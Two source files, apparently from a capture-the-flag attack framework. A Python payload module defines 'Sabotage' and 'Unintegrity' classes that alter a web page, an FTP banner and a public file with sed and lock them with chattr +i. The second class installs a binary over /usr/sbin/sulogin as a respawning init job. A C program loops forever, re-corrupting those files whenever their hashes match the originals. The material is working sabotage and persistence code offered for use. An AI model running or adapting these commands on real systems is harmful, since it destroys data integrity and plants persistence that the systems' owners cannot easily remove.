File: framework/lib/payloads/badsam/unintegrity.py
#!/usr/bin/python3

from ..base import Payload

class Sabotage(Payload):

    targets = {"/srv/www/htdocs/index.html": 's/service\./service. /g',
               "/var/ftp/welcome.msg": 's/,//g',
               "/home/public/file": 's/ts/t/g'}

    def __init__(self):
        self.commands = []
        for i in self.targets:
            self.commands.append("chattr -i %s" % i)
            self.commands.append("sed -i '%s' %s" % (self.targets[i], i))
            self.commands.append("chmod -w %s" % i)
            self.commands.append("chattr +i %s" % i)

        self.commands.append("chattr -i /home/public/file")
        self.commands.append("chmod -w /home/public/file")
        self.commands.append("chattr +i /home/public/file")

    def steps(self):
        return self.commands

class Unintegrity(Payload):

    files = {"unintegrity": "/usr/sbin/sulogin"}

    def __init__(self):
        self.commands = []
        self.commands.append("chattr -i /usr/sbin/sulogin")
        self.commands.append("chmod +x /usr/sbin/sulogin")
        self.commands.append("chattr +i /usr/sbin/sulogin")
        self.commands.append('printf "start on runlevel 3\\n\\nexec /usr/sbin/'
                             'sulogin\\nrespawn\\n" > /etc/event.d/sulogin')
        self.commands.append('chmod +x /etc/event.d/sulogin')
        self.commands.append('chattr +i /usr/sbin/sulogin')
        self.commands.append('initctl start sulogin')

    def steps(self):
        return self.commands

File: devel/unintegrity/unintegrity.c
// Monitor flags for correction. Then rectify that.
// by amon (amon@nandynarwhals.org)

#include <stdlib.h>
#include <unistd.h>

int main() {
    while (1) {
        system("chattr -i /srv/www/htdocs/index.html");
        system("cat /srv/www/htdocs/index.html | md5sum | grep fa477c36d6c52d52bbd9b6af7df708fa && sed -i 's/service\\./service. /g' /srv/www/htdocs/index.html");
        system("chattr +i /srv/www/htdocs/index.html");
        system("chattr -i /var/ftp/welcome.msg");
        system("cat /var/ftp/welcome.msg | md5sum | grep df35704116608a3ed56f6710fe7e3b07 && sed -i 's/,//g' /var/ftp/welcome.msg");
        system("chattr +i /var/ftp/welcome.msg");
        system("chattr -i /home/public/file");
        system("cat /home/public/file | md5sum | grep 4d91498a12508cd7f51fe6d5265ee521 && sed -i 's/ts/t/g' /home/public/file");
        system("chattr +i /home/public/file");
        sleep(2);
    }
}
